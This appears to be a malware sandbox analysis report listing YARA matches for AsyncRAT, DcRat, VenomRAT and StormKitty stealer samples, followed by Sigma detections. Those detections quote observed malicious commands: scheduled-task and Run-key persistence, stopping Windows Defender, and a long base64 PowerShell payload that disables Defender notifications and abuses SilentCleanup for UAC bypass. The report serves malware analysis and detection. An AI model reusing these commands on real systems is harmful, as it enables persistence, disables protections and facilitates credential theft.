0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf876:$q1: Select * from Win32_CacheMemory 0xf8b6:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf904:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf952:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
2.0.Client.exe.350000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
2.0.Client.exe.350000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf876:$q1: Select * from Win32_CacheMemory 0xf8b6:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf904:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf952:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
3.2.Infected.exe.28ed1c8.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
3.2.Infected.exe.28ed1c8.1.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xb3e8:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xb436:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xb484:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
3.2.Infected.exe.28ed1c8.1.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xb9e4:$s1: DcRatBy
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xda76:$q1: Select * from Win32_CacheMemory 0xdab6:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xdb04:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xdb52:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
2.2.Client.exe.26a68b0.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
2.2.Client.exe.26a68b0.1.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xda76:$q1: Select * from Win32_CacheMemory 0xdab6:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xdb04:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xdb52:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xb3e8:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xb436:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xb484:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xb9e4:$s1: DcRatBy
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xb3e8:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xb436:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xb484:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xb9e4:$s1: DcRatBy
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xda76:$q1: Select * from Win32_CacheMemory 0xdab6:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xdb04:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xdb52:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
3.2.Infected.exe.28ed1c8.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
3.2.Infected.exe.28ed1c8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xd1e8:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xd236:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xd284:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
3.2.Infected.exe.28ed1c8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xd7e4:$s1: DcRatBy
20.2.Loader.exe.1d000000.5.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x2f9cd:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x2f91c:$s2: L2Mgc2NodGFza3MgL2
20.2.Loader.exe.1dc20000.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.Loader.exe.1dc20000.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x125571:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
20.2.Loader.exe.1dc20000.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x12b80b:$s1: \VPN\NordVPN 0x12b7f1:$s2: \VPN\OpenVPN 0x12b7d3:$s3: \VPN\ProtonVPN
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xd1e8:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x1ce80:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xd236:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x1cece:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xd284:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x1cf1c:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xd7e4:$s1: DcRatBy 0x1d47c:$s1: DcRatBy
21.2.Loaader.exe.1d630000.7.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
21.2.Loaader.exe.1d630000.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
21.2.Loaader.exe.1d630000.7.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x175164:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
21.2.Loaader.exe.1d630000.7.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x17b676:$s1: \VPN\NordVPN 0x17b65c:$s2: \VPN\OpenVPN 0x17b63e:$s3: \VPN\ProtonVPN
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf876:$q1: Select * from Win32_CacheMemory 0x220de:$q1: Select * from Win32_CacheMemory 0x34976:$q1: Select * from Win32_CacheMemory 0xf8b6:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x2211e:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x349b6:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf904:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x2216c:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x34a04:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf952:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x221ba:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x34a52:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
21.2.Loaader.exe.1d630000.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
21.2.Loaader.exe.1d630000.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
21.2.Loaader.exe.1d630000.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x176f64:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
21.2.Loaader.exe.1d630000.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x17d476:$s1: \VPN\NordVPN 0x17d45c:$s2: \VPN\OpenVPN 0x17d43e:$s3: \VPN\ProtonVPN
20.2.Loader.exe.1dc20000.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.Loader.exe.1dc20000.7.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x123771:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
20.2.Loader.exe.1dc20000.7.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x129a0b:$s1: \VPN\NordVPN 0x1299f1:$s2: \VPN\OpenVPN 0x1299d3:$s3: \VPN\ProtonVPN
20.2.Loader.exe.1d160000.6.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
20.2.Loader.exe.1d160000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.Loader.exe.1d160000.6.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
20.2.Loader.exe.1d160000.6.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x951b5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x95227:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x952b1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x95343:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x953ad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x9541f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x954b5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x95545:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
2.2.Client.exe.26a68b0.1.raw.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
2.2.Client.exe.26a68b0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf876:$q1: Select * from Win32_CacheMemory 0xf8b6:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf904:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf952:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
20.2.Loader.exe.1d160000.6.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
20.2.Loader.exe.1d160000.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.Loader.exe.1d160000.6.raw.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
20.2.Loader.exe.1d160000.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x96fb5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x97027:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x970b1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x97143:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x971ad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x9721f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x972b5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x97345:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 64 entries

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Infected.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Infected.exe, ParentProcessId: 3144, ParentProcessName: Infected.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' & exit, ProcessId: 748, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\WinDefend.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\WinDefend.exe, ProcessId: 4768, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YourAppName

Sigma detected: Suspicious Windows Service Tampering

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: "C:\Windows\system32\net1.exe" stop windefend, CommandLine: "C:\Windows\system32\net1.exe" stop windefend, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\net1.exe, NewProcessName: C:\Windows\System32\net1.exe, OriginalFileName: C:\Windows\System32\net1.exe, ParentCommandLine: powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4476, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\net1.exe" stop windefend, ProcessId: 4196, ProcessName: net1.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\WinDefend.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\WinDefend.exe, ProcessId: 4768, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YourAppName

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMA

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 748, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' , ProcessId: 7196, ProcessName: schtasks.exe

Sigma detected: Local Accounts Discovery

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\system32\whoami.exe" /groups, CommandLine: "C:\Windows\system32\whoami.exe" /groups, CommandLine|base64offset|contains: , Image: C:\Windows\System32\whoami.exe, NewProcessName: C:\Windows\System32\whoami.exe, OriginalFileName: C:\Windows\System32\whoami.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbA